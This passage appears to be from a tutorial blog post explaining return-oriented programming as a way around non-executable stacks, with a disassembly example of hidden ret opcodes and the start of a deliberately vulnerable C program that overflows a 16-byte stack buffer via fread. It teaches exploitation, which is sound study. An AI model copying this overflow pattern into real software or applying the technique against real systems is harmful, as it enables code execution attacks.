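p = carry_trade_expected_profit(i_borrow=0.05, i_invest=0.12, expected_s=-0.05)
print(round(p, 3))  # 0.014
```

Note the asymmetry the Fidelity episode illustrates: the 1.4% is only an expected profit; a single large devaluation (expected_s far below -5%) wipes it out.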
Based on linearized IFE: sT ≈ (id - if) x T/360
Expect a 45 degree line in a plot of sT against (id-if)
Example: Plot for the monthly USD/EUR exchange rate (1999-2007)
No 45° line => Visual evidence rejects IFE. ¶
st = (St+T - St)/St = α + β (id - if)t + εt,   (εt: error term, E[εt]=0).
The null hypothesis is: H0 (IFE true): α=0 and β=1
H1 (IFE not true): α≠0 and/or β≠1
Example: Testing IFE for the USD/EUR with monthly data (99-07).
R2 = 0.057219
Standard Error = 0.016466
F-statistic (slopes=0) = 6.311954 (p-value=0.0135)
F-test (α=0 and β=1) = 76.94379 (p-value= lower than 0.0001)
=> rejects H0 at the 5% level (F2,104,.05=3.09)
Observations = 106
tα=0 (t-test for α = 0): (0.00293 – 0)/0.001722 = 1.721
=> cannot reject at the 5% level.
tβ=1 (t-test for β = 1): (-0.26342-1)/0.10485 = -12.049785
=> reject at the 5% level.
Formally, IFE is rejected in the short-run (both the joint test and the t-test reject H0). Also, note that β is negative, not positive as IFE expects. ¶
• IFE: Evidence
Similar to PPP, no short-run evidence. Some long-run support:
=> Currencies with high interest rate differential tend to depreciate.
(For example, the Mexican peso finally depreciated in Dec. 1994.)
• According to the Expectations hypothesis (EH) of exchange rates:
Et[St+T] = Ft,T.
That is, on average, the future spot rate is equal to the forward rate.
Since expectations are involved, many times the equality will not hold. It will only hold on average.
Data: Ft,180 = 5.17 ZAR/USD.
An investor expects: E[St+180]=5.34 ZAR/USD. (A potential profit!)
Strategy for the non-EH investor:
1. Buy USD forward at ZAR 5.17
2. In 180 days, sell the USD for ZAR 5.34.
Now, suppose everybody expects St+180 = 5.34 ZAR/USD
=> Disequilibrium: everybody buys USD forward (nobody sells USD forward). And in 180 days, everybody will be selling USD. Prices should adjust until EH holds.
Since an expectation is involved, sometimes you’ll have a loss, but, on average, you’ll make a profit. ¶
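The non-EH investor's expected payoff per USD bought forward is the gap between the expected spot and the forward price; a quick sketch with the example's numbers:

```python
f = 5.17    # forward rate, ZAR/USD
e_s = 5.34  # investor's E[S_{t+180}], ZAR/USD

profit_per_usd = e_s - f
print(round(profit_per_usd, 2))            # 0.17 ZAR per USD bought forward
print(round(profit_per_usd / f * 100, 2))  # 3.29 (% on the forward price)
```

Under EH this expected profit should be zero; a persistent non-zero gap is exactly the disequilibrium described above.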
Under EH, Et[St+T] = Ft,T → Et[St+T - Ft,T] = 0
Empirical tests of the EH are based on a regression:
(St+T - Ft,T)/St = α + β Zt + εt, (where E[εt]=0)
where Zt represents any economic variable that might have power to explain St, for example, (id-if).
The EH null hypothesis: H0: α=0 and β=0. (Recall (St+T - Ft) should be unpredictable!)
Usual result: β < 0 (and significant) when Zt= (id-if).
But, the R2 is very low.
(St+T - St)/St = st = α + β (id - if) + εt.
The null hypothesis is H0: α=0 and β=1.
Usual Result: β < 0. When (id - if) = 2%, the exchange rate depreciates by (β x .02) instead of appreciating by 2% as predicted by UIPT!
Summary: Forward rates have little power for forecasting spot rates
Puzzle (the forward bias puzzle)!
Explanations of forward bias puzzle:
- Risk premium? (holding a risky asset requires compensation)
- Errors in calculating Et[St+T]? (It takes time to learn the game)
- Peso problem? (small sample problem)
The risk premium of a given security is defined as the return on this security, over and above the risk-free return.
Q: Should there be a risk premium in FX markets? A: Only if exchange rate risk is not diversifiable.
After some simple algebra, we find that the expected excess return on the FX market is given by:
(Et[St+T] - Ft,T)/St = Pt,t+T.
A risk premium, P, in FX markets implies
Et[St+T] = Ft,T + St Pt,t+T.
If Pt,t+T is consistently different from zero, markets will display a forward bias.
Data: St = 1.58 USD/GBP
Et[St+6-mo] = 1.60 USD/GBP
Ft,6-mo= 1.62 USD/GBP.
The GBP is expected to appreciate against the USD by 1.27%
The forward premium suggests a GBP appreciation of 2.53%.
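Using the definition Pt,t+T = (Et[St+T] - Ft,T)/St, the example's numbers imply a negative risk premium: the forward premium overstates the expected appreciation. A quick sketch:

```python
s, e_s, f = 1.58, 1.60, 1.62  # spot, expected spot, 6-mo forward (USD/GBP)

expected_appreciation = (e_s - s) / s  # what the investor expects
forward_premium = (f - s) / s          # what the forward "predicts"
risk_premium = (e_s - f) / s           # P = (E[S] - F)/S

print(round(expected_appreciation * 100, 2))  # 1.27
print(round(forward_premium * 100, 2))        # 2.53
print(round(risk_premium * 100, 2))           # -1.27
```

If P is consistently different from zero like this, the forward rate is a biased predictor of the future spot rate.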
(1) BOP approach treats exchange rates as determined in flow markets.
(2) Monetarist approach treats exchange rates as any other asset price.
• Balance Of Payments (BOP)
BOP divides the flow of foreign currency to the domestic country into:
Current account (CA): measures the movement of goods and services + unilateral transfers.
Capital Account (KA): measures financial transactions associated with trade + changes in the composition of international portfolios.
Official Account (OR): measures changes in official reserves.
BOP = CA + KA + OR.
• As long as the country is not bankrupt, BOP = 0.
In general, OR is small, so CA ≈ -KA.
•The Balance of Trade as a determinant of exchange rates
• BOP: Supply and demand for a currency arise from the flows related to the BOP: trade, portfolio investment, and direct investment.
BOP approach views exchange rates as determined in flow markets.
• The Balance of Trade theory simplifies the BOP approach: It postulates a relation between CA and Rt (Real exchange rate = StPf/Pd):
CA = X - M = f(Rt, Yd,Yf).
In general, exchange rates move to compensate a trade imbalance:
Rt ↑ (St ↑) => X ↑ and M ↓ (CA ↑)
Rt ↓ (St ↓) => X ↓ and M ↑ (CA ↓)
• The Macroeconomics of the BOP: Absorption Approach
In equilibrium, we can write:
CA = S - [I + (G - T)],
where
S: after-tax private savings.
I: private investment.
G: government spending.
T: national taxes.
To reduce a CA deficit, one of the following must happen in equilibrium:
i. S ↑, for a given level of I and (G-T).
ii. I ↓, for a given level of S and (G-T).
iii. (G-T) ↓, for a given level of S and I.
Example: Japan has a (relative) high savings rate. Many argue that this is the reason behind the persistent Japanese CA surpluses. ¶
• The Monetary Approach to the BOP
Consider the capital account (KA):
when the OR is small, KA provides the other side of the CA.
KA is assumed to depend on the interest rate differential and St:
KA = f(id-if, St).
• Look at the KA:
When KA > 0 (CA<0) the country is either accumulating debt or selling its current stock of foreign assets.
When KA < 0 (CA>0) the country is either reducing debt or increasing its current stock of foreign assets.
Example: Japan may run a CA>0 without changes in the real JPY, as long as the Japanese continue to accumulate foreign assets. ¶
• BOP Approach: Implications
First, we ignored financial flows when we analyzed the BOP. We said:
A CA deficit (surplus) tends to be corrected with a depreciation (appreciation) of St.
But once we consider the capital account, this depreciation (appreciation) might not occur: foreigners might finance the CA imbalance.
In the long-run the BOP approach has more precise predictions:
countries will not be able to finance CA imbalances forever.
continuous CA deficits in the long-run will create KA outflows and depreciation pressures.
Exchange rates are asset prices traded in efficient markets.
Like other asset prices, exchange rates are determined by expectations.
Current trade flows are irrelevant (flow markets are not important).
• Asset approach models assume a high degree of capital mobility between assets denominated in different currencies.
We need to specify the assets an investor considers.
For example, a simple monetary model considers domestic and foreign money. Only news related to these assets will move exchange rates.
• A Simple Monetary Approach Model
Assets: domestic money and foreign money.
We start from the equilibrium QTM relation:
Mj Vj = Pj Yj j = domestic country, foreign country.
To get St, we use Absolute PPP, where St is a ratio of prices (= Pd/Pf):
St = (Vd/Vf) x (Yf/Yd) x (MSd/MSf),
Vj: velocity of money of country j,
Yj: real output of country j,
MS,j: supply for money of country j (in equilibrium, MS=LD).
Recall that xt,T = (Xt+T - Xt)/Xt ≈ log(Xt+T) – log(Xt) (=> a growth rate).
Assuming V is constant, we express the model in changes:
=> st,T = yf,T - yd,T + mSd,T - mSf,T.
• A Simple Monetary Approach Model
The simple Monetary Model produces the following model for st,T :
=> st,T = yf,T - yd,T + mSd,T - mSf,T.
• Monetary Approach: Implications
- A stable monetary policy –i.e., low mSd– tends to appreciate the DC.
- Economic growth –i.e., yd,T>0 – tends to appreciate the DC.
But, keep in mind that all variables are in relative terms.
Note: St behaves like any other speculative asset price: St changes whenever relevant information –in this case, money growth and GDP growth –is released.
• Monetary Approach: Application
Example: Forecasting St with the simple monetarist model.
The money supply in the U.S. market increases by 2% and all the other variables remain unchanged.
yf,T = yd,T = mSf,T = 0.
mSd,T = .02 => st,T = .02.
MSd increases 2% => St increases 2% (a depreciation of the USD).
Now, if investors expect the U.S. Fed to quickly increase U.S. interest rates to avoid inflationary pressures, then the USD may appreciate instead of depreciate. ¶
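The model in changes is a one-liner; a sketch replicating the example (the function name is ours):

```python
def st_monetary(y_d, y_f, ms_d, ms_f):
    """Simple monetary model (V constant): s = (y_f - y_d) + (ms_d - ms_f)."""
    return (y_f - y_d) + (ms_d - ms_f)

# U.S. money supply grows 2%; everything else unchanged
print(st_monetary(y_d=0.0, y_f=0.0, ms_d=0.02, ms_f=0.0))  # 0.02 => 2% USD depreciation
```

Symmetrically, domestic output growth (y_d > 0) makes s negative –an appreciation of the DC– as stated in the implications above.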
• Monetary Approach: Sticky Prices
There are many variations of the monetary model.
• One popular variation takes into account that PPP is not a good short-run theory and proposes sticky prices (in the short-run).
The sticky prices monetary model incorporates the fact that exchange rates are a lot more volatile than prices of goods and services.
• While prices of goods and services do not react instantaneously to "shocks" –say, a monetary shock–, financial prices do. In this case, the exchange rate overreacts (depreciates more than it would in a non-sticky-prices world) to bring prices and quantities immediately to equilibrium.
In the long-run, prices will adjust and the exchange rate will appreciate back toward its long-run level. This pattern –an initial overreaction that is later corrected– is called overshooting.
This is a popular model to explain the behavior of St after financial crisis.
• Monetary Approach: Sticky Prices
• There is a shock in the economy (a monetary shock).
• Prices do not react instantaneously. We move from A to B. Inflation stays at Id,0, but the exchange rate overreacts (depreciates more than it should in non-sticky prices world) to bring prices and quantities immediately to equilibrium.
• In the long-run, prices will adjust (with higher inflation, Id,1) and the exchange rate will appreciate, moving to s1.
[Figure: overshooting diagram. Axes: inflation (Id) and the exchange rate (st). Labeled points: A (initial equilibrium at Id,0 and s0), B (short-run overshoot at Id,0 and s2), C (long-run equilibrium at Id,1 and s1).]
• Structural Models: Evidence
• Standard tests of structural models are based on a regression:
st = α + β Zt + εt
where Zt represents a structural explanatory variable: money growth, income growth rates, (id-if), etc.
Usual results:
- The null hypothesis, H0: β=0, is difficult to reject.
- The R2 tends to be small.
• Many economists suggest that structural models are misspecified because of the so-called structural change problem: the parameters change with changes in economic policy!
For example, a new Chairman of the Fed may have an effect on the coefficient β. Then, St may become more sensitive to (id-if).
• Structural Models: Evidence
• But, studies analyzing the movement of St around news announcements have found some support for structural models.
• These event studies find that news about:
- Greater than expected U.S. CA deficits tend to depreciate the USD, as predicted by the BOP approach.
- Unexpected U.S. economic growth tends to appreciate the USD, as predicted by the monetary approach.
- Positive MS surprises tend to appreciate the USD. (Consistent with the monetary approach if agents expect the US Fed to quickly change interest rates to offset the increase in money supply.)
- Unexpected increases (decreases) of interest rate differentials tend to depreciate (appreciate) the domestic currency, as predicted by the monetary approach.
• Regression-based structural models do poorly. But, the variables used in structural models tend to have power to explain changes in St.
• Parity Conditions
- PPP => Rejected in the short-run, some long-run support.
- IFE => Rejected in the short-run, some long-run support.
- EH => Rejected in the short-run. Puzzle!
• Structural models
- BOP & Monetary Approach
=> Rejected in the short-run, some support through event studies.
• Q: Why is st so (statistically) difficult to explain?
The Martingale-Random Walk Model
A random walk is a time series independent of its own history. Your last step has no influence on your next step: the past does not help to explain the future.
Motivation: A drunk walking in a park. (Problem posed by Karl Pearson in Nature, July 1905 issue.)
Intuitive notion: The FX market is a "fair game." (Unpredictable!)
• Martingale-Random Walk Model: Implications
The Random Walk Model (RWM) implies:
Et[St+T] = St.
Powerful theory: at time t, all the info about St+T is summarized by St.
Theoretical Justification: Efficient Markets (all available info is incorporated into today’s St.)
Example: Forecasting with RWM
St = 1.60 USD/GBP
Et[St+7-day] = 1.60 USD/GBP
Et[St+180-day] = 1.60 USD/GBP
Et[St+10-year] = 1.60 USD/GBP. ¶
Note: If St follows a random walk, a firm should not spend any resources to forecast St+T.
• Martingale-Random Walk Model: Evidence
Meese and Rogoff (1983, Journal of International Economics) tested the short-term forecasting performance of different models for the four most traded exchange rates. They considered economic models (PPP, IFE, Monetary Approach, etc.) and the RWM.
The metric used in the comparison: forecasting error (squared).
The RWM performed as well as any other model.
Cheung, Chinn and Pascual (2005) checked Meese and Rogoff's results with 20 more years of data. The RWM was still the best model.
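The flavor of the Meese–Rogoff comparison can be reproduced on simulated data (not their actual data or models). If St is close to a random walk, the naive forecast E[St+1] = St is hard to beat on squared forecasting error, even by a model that estimates and adds a drift:

```python
import random

random.seed(7)

# Simulate a (log) exchange rate as a driftless random walk
s = [1.0]
for _ in range(500):
    s.append(s[-1] + random.gauss(0, 0.03))

# One-step-ahead forecasts
rw_forecast = s[:-1]                    # RWM: E[S_{t+1}] = S_t
drift = (s[250] - s[0]) / 250           # a naive "model": add estimated drift
model_forecast = [x + drift for x in s[:-1]]

def mse(pred, actual):
    """Mean squared forecasting error, the Meese-Rogoff-style metric."""
    return sum((p - a) ** 2 for p, a in zip(pred, actual)) / len(actual)

# The two MSEs come out nearly identical: the RW is hard to beat
print(round(mse(rw_forecast, s[1:]), 6), round(mse(model_forecast, s[1:]), 6))
```

The same logic explains the empirical findings: when st is (nearly) unpredictable, structural variables add almost no out-of-sample forecasting power.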
USACO Bronze 2015 February - Censoring
Authors: Brad Ma, Ahmad Bilal
ExplanationExplanation
Let us define as the final censored text.
We can iterate through every character of , appending it to . However, whenever we append a character we we need to check if ends with the censored word. If it does, we remove it from by taking off the last few characters.
As a demonstration, let's try this on the example case where:
Our solution will loop through each character of , appending it to until it becomes , when it will cut off the last 3 characters since they equal . This results in becoming .
Right after this, becomes as the next letter in is , so we omit the last 3 characters again and becomes .
After this, the check isn't triggered anymore, so we end up with as our final word.
ImplementationImplementation
Time Complexity:
Python
import syssys.stdin = open('censor.in', 'r')sys.stdout = open('censor.out', 'w')s = input().strip()t = input().strip()censored = ""# Add each character to the censored stringfor char in s:
C++
#include "bits/stdc++.h"using namespace std;Code Snippet: {USACO-style I/O. See General / Input & Output (Click to expand)int main() {setIO("censor");string s;string t;cin >> s >> t;
Java
import java.util.*;import java.io.*;public class Censor {public static void main (String[] args) throws IOException {Kattio io = new Kattio("censor");String s = io.next();String t = io.next();// We use StringBuilder in Java because it's significantly faster
Join the USACO Forum!
Stuck on a problem, or don't understand a module? Join the USACO Forum and get help from other competitive programmers! | https://usaco.guide/problems/usaco-526-censoring/solution | CC-MAIN-2022-40 | refinedweb | 271 | 58.18 |
0
I posted a program earlier today in response to another thread and noticed that I had forgotten to clean up/free the memory I used. Here's the program.
#include <iostream> using namespace std; int main() { int LIST_SIZE, NUM_CHARS_PER_ELEMENT; cout << "Enter number of elements in list: "; cin >> LIST_SIZE; cout << "Enter number of characters in each array element: "; cin >> NUM_CHARS_PER_ELEMENT; char **list = new char*[LIST_SIZE]; for (int i = 0; i < LIST_SIZE; i++) { list[i] = new char[NUM_CHARS_PER_ELEMENT]; } cout << "Enter " << LIST_SIZE << " names\n"; for (int i = 0; i < LIST_SIZE; i++) { cout << "Enter name " << i << " : "; cin >> list[i]; } cout << "Here are the names\n"; for (int i = 0; i < LIST_SIZE; i++) { cout << "Name " << i << " : " << list[i] << endl; } for (int i = 0; i < LIST_SIZE; i++) delete []list[i]; delete list; return 0; }
I left off lines 33 through 36 in my prior post. My question is this. Are lines 33 - 36 necessary? What happens if I leave them out? Our instructors drilled into our heads the need to free any memory we reserved with
new once we were done with it, but in this case, since this is done at the very end of the program, does it really matter? Isn't the memory released automatically when the program ends? | https://www.daniweb.com/programming/software-development/threads/204623/what-happens-if-i-don-t-free-the-memory-i-reserved-in-the-program | CC-MAIN-2017-47 | refinedweb | 207 | 63.53 |
Meet Pandas: loc, iloc, at & iat
April 27, 2020 | 4 min read | 115 views
Have you ever confused Pandas methods
loc,
iloc,
at, and
iat with each other? Pandas is a great library for handling tabular data, but its API is too diverse and somewhat unintuitive. Understanding its design concepts might help it to some extent 🐼
So, this post aims to help understand differences between Pandas
loc,
iloc,
at, and
iat methods. In short, the differences are summarized in the table below:
* If this table makes sense, you won’t need this post any more.
Let’s find the differences using a simple example!
Load Example Data
In this post, I use the iris dataset in the scikit-learn. The snippets in this post are supposed to be executed on Jupyter Notebook, Colaboratory, and stuff.
import pandas as pd from sklearn.datasets import load_iris iris = load_iris() df = pd.DataFrame(iris.data, columns=iris.feature_names) df
The dataframe should look something like this.
at & iat Access a Scalar Value
If you just want to access a scalar value in the dataframe, it is fastest to use
at and
iat methods. They both take two arguments to specify the row and the column to access, and produce the same outputs. The difference between them are discussed afterwards.
print(df.at[0, "sepal width (cm)"]) # 3.5 print(df.iat[0, 1]) # 3.5
loc & iloc Access Multiple Values
When you want to access a scalar value,
loc and
iloc methods are a bit slower but produce the same outputs as
at and
iat methods.
print(df.loc[0, "sepal width (cm)"]) # 3.5 print(df.iloc[0, 1]) # 3.5
However,
loc and
iloc methods can also access multiple values at a time. The following two statements give the same results: the values at the first row and the first two columns.
print(df.loc[0, :"sepal width (cm)"]) print(df.iloc[0, :2]) # sepal length (cm) 5.1 # sepal width (cm) 3.5 # Name: 0, dtype: float64
The sliced form of the second argument is invalid for
at and
iat methods.
print(df.at[0, :"sepal width (cm)"]) print(df.iat[0, :2]) # TypeError: unhashable type: 'slice'
You can input boolean arrays to specify rows and columns to access.
print(df.loc[0, [True, True, False, False]]) print(df.iloc[0, :2]) # sepal length (cm) 5.1 # sepal width (cm) 3.5 # Name: 0, dtype: float64
at & loc vs. iat & iloc
So, what exactly is the difference between
at and
iat, or
loc and
iloc? I first thought that it’s the type of the second argument. Not accurate.
at and
loc methods access the values based on its labels, while
iat and
iloc methods access the values based on its integer positions.
This difference is clear when you sort the dataframe.
df_sorted = df.sort_values("sepal width (cm)") df_sorted
Note that the indices are re-ordered according to the
sepal width (cm) column.
Now, the label-based
df_sorted.at[0, "sepal width (cm)"] finds the row labeled
0 but the position-based
df_sorted.iat[0, 1] finds the row at the top. The relationship between
loc and
iloc methods is the same. Therefore:
print(df_sorted.at[0, "sepal width (cm)"]) # 3.5 print(df_sorted.iat[0, 1]) # 2.0 print(df_sorted.loc[0, "sepal width (cm)"]) # 3.5 print(df_sorted.iloc[0, 1]) # 2.0
Conclusion
I hope this helps someone understand the differences between these confusing methods.
That’s it for today. Stay safe!
References
[1] Indexing and selecting data — pandas 1.0.3 documentation
[2] pandasで任意の位置の値を取得・変更するat, iat, loc, iloc | note.nkmk.me | https://hippocampus-garden.com/pandas_loc/ | CC-MAIN-2020-40 | refinedweb | 604 | 77.03 |
/* ** (c) COPYRIGHT MIT 1995. ** Please first read the full copyright statement in the file COPYRIGH. */
This is the module for accessing local files and directories. The module contans
#ifndef WWWFILE_H #define WWWFILE WWWFile interface provides a platform independent access scheme for local files. The local file access works exactly like any other access scheme, for example HTTP, in that the "file protocol" is independent of the underlying transport. This can be used to for example slide in a CVS transport layser underneath the file module without making any modifications to the file module itself. You can read more about the transport managament in the Transport Interface.
#include "HTFile.h"
When accessing the local file system, you can enable content negotiation
as described in the HTTP
specification. The content negotiation algorithm is based on file
suffixes as defined by the Bind manager. When looking
for a file you do not have to specify a suffix. Instead this module
looks for all alternatives with the same main name. For example, looking
for the file Overview can result in any of the files (or directories)
Overview.txt, Overview.html, Overview.ps etc. The selection
algorithm is based on the values of the preferences for language, media type,
encoding, etc. - exactly like a server would do with the
accept
headers.
#include "HTMulti.h"
This module sets up the binding between a file suffix and a media type, language, encoding etc. In a client application the suffixes are used in protocols that does not directly support media types etc., like FTP, and in server applications they are used to make the bindings between the server and the local file store that the server can serve to the rest of the world (well almost)
#include "HTBind.h"
Register the default set of bindings between file suffixes and media types. This is used for example to guess the media type of a FTP URL of a local file URL.
#include "HTBInit.h"
End of FILE module
#ifdef __cplusplus } /* end extern C definitions */ #endif #endif | http://www.w3.org/Library/src/WWWFile.html | CC-MAIN-2013-20 | refinedweb | 337 | 54.73 |
Help:Style/White space
This article defines the standards for the use of whitespace characters in the source code of articles. The style used in the examples is to be considered an integral part of the rules..
- There should be no blank lines separating the elements of the article's header (magic words, categories and interlanguage links), nor between the header and the first line of body text or markup.
- In the body of the article, separate special blocks (the related articles box, lists, code blocks, article status templates, notes, tips, warnings etc.) from normal text with an empty line.
Main, Category, ArchWiki, Help namespaces
Example
[[Category:Example A]] [[Category:Example B]] [[es:Article]] [[zh-hans === Single. -- ~~~~ | https://wiki.archlinux.org/title/Help:Style/White_space | CC-MAIN-2022-05 | refinedweb | 117 | 52.9 |
Using curl over ftp took 3+ minutes for a 4 byte file w/ EPSV
It took over 3 minutes to download a 4 byte file with curl via ftp. It took less than a second with wget.
$ time curl -o testfile.txt -u myusername:mypassword
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4 0 4 0 0 0 0 --:--:-- 0:03:09 --:--:-- 0 real 3m9.411s user 0m0.000s sys 0m0.050s
Running curl with the verbose option¶
Running curl with the verbose option showed it was failing in "Extended Passive Mode".
$ curl -v -o testfile.txt -u myusername:mypassword
* About to connect() to port 21 (#0) * Trying 10.1.2.102... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0connected * Connected to (10.1.2.102) port 21 (#0) < 220 Welcome! 01-srv. > USER myusername < 331 Please specify the password. > PASS mypassword < 230 Login successful. > PWD < 257 "/" * Entry path is '/' > CWD dmi < 250 Directory successfully changed. > EPSV * Connect data stream passively < 229 Entering Extended Passive Mode (|||58226|) 0 0 0 0 0 0 0 0 --:--:-- 0:03:09 --:--:-- 0Connection timed out * couldn't connect to host * got positive EPSV response, but can't connect. Disabling EPSV > PASV < 227 Entering Passive Mode (10,1,2,102,190,42) * Trying 10.1.2.102... connected * Connecting to 10.1.2.102 (10.1.2.102) port 48682 > TYPE I < 200 Switching to Binary mode. > SIZE testfile.txt < 213 4 > RETR testfile.txt < 150 Opening BINARY mode data connection for testfile.txt (4 bytes). * Maxdownload = -1 * Getting file with size: 4 { [data not shown] * Remembering we are in dir "path/to/" < 226 File send OK.
Disabling EPSV¶
I googled and found that some servers have a problem using Extended Passive Mode (EPSV). To disable Extended Passive Mode, use the
--disable-epsv option. With this option, the download took 0.046 seconds.
$ time curl --disable-epsv -o testfile.txt -u myusername:mypassword
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4 100 4 0 0 112 0 --:--:-- --:--:-- --:--:-- 133 real 0m0.046s user 0m0.010s sys 0m0.000s
Disabling EPSV with libcurl¶
Set
CURLOPT_FTP_USE_EPSV to 0. See.
Disabling EPSV with pycurl¶
import pycurl c = pycurl.Curl() c.setopt(c.FTP_USE_EPSV, 0) | https://www.saltycrane.com/blog/2011/10/using-curl-ftp-took-3-minutes-4-byte-file-epsv/ | CC-MAIN-2019-47 | refinedweb | 399 | 76.93 |
The Google+ Follow button is a simple widget that works well in site designs that that use other social follow buttons or when space is constrained.
Like the badges, your users can immediately add your page or profile to their circles without leaving your site.
Use of Google+ buttons are subject to the Google+ Platform Buttons Policy.
Adding the Google+ Follow button to your page
The Google+ follow button adds a simple, smaller form factor button to your page, which quickly allows visitors to add you or your page to their circles. The minimum code required to render a Google+ follow button on your website is one JavaScript include and the follow button tag, for example:
<script src="" async defer></script> <-- Place this tag where you want the button to render. --> <div class="g-follow" data-</div>
You can also use the custom
<g:follow > tag; however, the HTML5
markup is the recommended approach.
<script src="" async defer></script> <g:follow</g:follow>
Example follow button sizes
For the follow button, you have three choices for the height of your
button:
15,
20, and
24 pixels.
The width of the button is automatically calculated to fit the label
in the user's language.
Tag attributes for the follow button
You can set these parameters as
attribute="value" pairs on the
button tag, or as
key:value pairs in a call to
gapi.follow.render.
If you use HTML5 markup, prefix the attribute names below with
data-, for example:
data-rel="author". follow button JavaScript defines two button-rendering functions under
the
gapi.follow namespace. You must call one of these
functions if you disable automatic rendering by setting
parsetags to
"
explicit".
FAQs
- What data is sent to Google when you click the follow button?
- When a user clicks a Follow button, Google receives information including the URL of the page/profile/community followed, information about the user's Google profile, the user's IP address, and other browser-related information. | https://developers.google.com/+/web/follow/?hl=zh-tw | CC-MAIN-2019-22 | refinedweb | 330 | 57.71 |
Uday Girajavagol1,127 Points
Challenge Error - Task 1 is not passing
I am getting error that task 1 is not passing. What is this error?
import random start = 5 while start: N = random.randint(1,99) if even_odd(N): print("{} is even".format(N)) else: print("{} is odd".format(N)) start=start - 1 def even_odd(num): # If % 2 is 0, the number is even. # Since 0 is falsey, we have to invert it with not. return not num % 2
1 Answer
Jennifer NordellTreehouse Staff
Hi there, Uday! First, you're doing terrific. Your syntax and logic are pretty spot on, but it's your ordering that's a bit off. You were meant to write that
while loop below the definition of the
even_odd function. If you try running your code as it is now, through step 1, you will get back this:
Bummer! name 'even_odd' is not defined
You've run into the most common reason for getting a "Task 1 is no longer passing" and it is due to a syntax error. When this happens, your code can no longer be interpreted at all, thus invalidating all code there.
In this case, you're trying to use the
even_odd function in the
while loop, but that function isn't defined until after the loop. Try moving your
even_odd function back to the top of the file. When I do this, your code passes all steps.
Hope this helps!
Uday Girajavagol1,127 Points
Uday Girajavagol1,127 Points
Jennifer Nordell ...Thanks...I am used to MATLAB....I used ordering pattern like MATLAB....Now I got it...Thanks again.. | https://teamtreehouse.com/community/challenge-error-task-1-is-not-passing | CC-MAIN-2019-39 | refinedweb | 268 | 85.59 |
I'm making a pong game for my software development class, and I should probably state that this is homework, hence my limited understanding. and I'm having some problems creating the AI for my NPC paddle. I'm using Kivy and Python.
Currently I can create impossible to beat AI by doing this:
#ai
self.player2.center_y = self.ball.y
self.player2.center_y
self.ball.y
"Every x seconds, the paddle will move x pixels in the y axis."
def serve_ball(self, vel=(10,0)):
self.ball.center = self.center
self.ball.velocity = vel
vel=(10,0)):
ball.velocity
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0/300.0)
return game
Clock.schedule_interval(game.update, 1.0/300.0)
def AI(self):
self.AI_Speed = self.ball.velocity - 10
self.player1.
Since this is such a big question, I haven't tested this out or anything, but it seems like you want to have some sort of function that moves the AI (I'll call it self.player2.move()). If you call this function in game.update(), then you should be able to move the AI paddle incrementally closer to where it needs to be to hit the ball.
Some basic pseudocode for self.player2.move():
figure out if ball is above or below paddle move self.AI_Speed units in the direction of the ball
You might need to adjust the AI speed more to make this work, but I think it should be the right general idea. If you think about it, the unbeatable AI is basically just infinitely fast.
Does that help get you unstuck? | https://codedump.io/share/SImS19vv4Xw4/1/creating-ai-for-pong-game--basic-understanding-of-speed-algorithm | CC-MAIN-2017-34 | refinedweb | 275 | 67.96 |
GRASS and C++
(page to be expanded)
Calling GRASS library functionality in C++
For working examples, see:
I/O:
Raster data processing
Image processing
Visualization:
Notes
C++ code that use C shared libraries needs to specify this fact to the compiler. This can be defined with the extern "C" keyword, in this way:
#ifdef __cplusplus extern "C" { #endif ... #ifdef __cplusplus } #endif
The C++ compiler will understand that the functions defined in gis.h are coded in C. If it is not specified the linking step will throw an error stating that the symbols for the C functions were not found in the shared library. Without the 'extern "C" ...' qualification, C++ assumes that functions have C++ linkage, meaning that the parameter types are embedded in the symbol name (C++ allows function overloading, where multiple functions can have the same name provided that they have different parameter types). | http://grass.osgeo.org/wiki/GRASS_and_C%2B%2B | crawl-003 | refinedweb | 146 | 50.57 |
The whole thing is about exploiting a stack based buffer overflow vulnerability. We have some application, that has some buffer, and it reads some user-provided data to some too-small buffer (I think I'm abusing some word). The story continues as always - the read data overwrites the stack data that's placed after the buffer. But, we have a few new "rules of engagement":
1. The stack is not executable (the W^X policy, turned on DEP, whatever), and, we are not able to place the shellcode in any other memory area.
2. There are no canaries of death, security cookies, nor any other zoological-culinary solutions.
3. We have accurate information about the libraries in memory, their addresses and versions (and we know exact opcodes that make the library).
4. ASLR (Address Space Layout Randomization, sometimes wrongly called by me Address Space Randomization Layer) is turned off, or predictable (with 100% accuracy) - for example this is a Vista, and we have information about library layout taken after the recent session started.
Since point 1 is in effect, placing the shellcode on the stack is pointless - in the moment EIP would reach it, an beautiful exception will be thrown, and our shellcode will not be executed.
As an answer to the not-executable stack, someone smart (I don't have information on who exactly that was) invented a technique called ret-to-libc, that works by making a chain of calls to the functions from libc (or other libraries) using the stack call/ret mechanism. Thanks to that, the EIP never goes to some not executable memory, however the attacker can redirect it to other useful places.
Return-oriented exploiting is an expansion of the above concept. The main change is that we do not return only to functions, instead, we also return to any code fragments that can be reused by us, and ends with some kind of a return instruction (ret/retn). This allows us to create almost any 'program' by reusing fragments of opcodes that lay in the memory. What's worth noticing, is that we are not restricted to ret/retn places on purpose by the compiler. We can also use the C3 and C2 XX XX that appear in memory as parts of other opcodes, for example let's take the MOV EAX, 0xC3414141 that will be compiled (assembled, whatever) to B8 41 41 41 C3, but, the disassembled instructions depend on the offset on which the disassembly starts:
(offset 0)
B8414141C3 mov eax,0xc3414141
(offset 1)
41 inc ecx
41 inc ecx
41 inc ecx
C3 ret
(offset 2)
41 inc ecx
41 inc ecx
C3 ret
(offset 3)
41 inc ecx
C3 ret
(offset 4)
C3 ret
As one can see, the interpretation of an instruction depends on the place that we call 'the beginning'.
OK, I think I've shown a little what will it all be about. The time has come to present an example program, that will be used as an illustration that will allow us to go deeper into the topic.
The application below is vulnerable to a typical stack-based buffer overflow attack. In the func () function the file sploitme.bin is read to a buffer declared to be the size of 16 bytes. However, in the call to fread function, as the size of the input data is used the size of the file (where it should be the buffer size) - this is where the overflow takes place.
Additionally, in the main() function there is a 16KB local buffer, that is placed there to expand the stack a little (explanation: during my tests the stack became to small, so I had to put the buffer there ;p).
#include <stdio.h>
int
func ()
{
char buf[16];
size_t sz;
FILE *f;
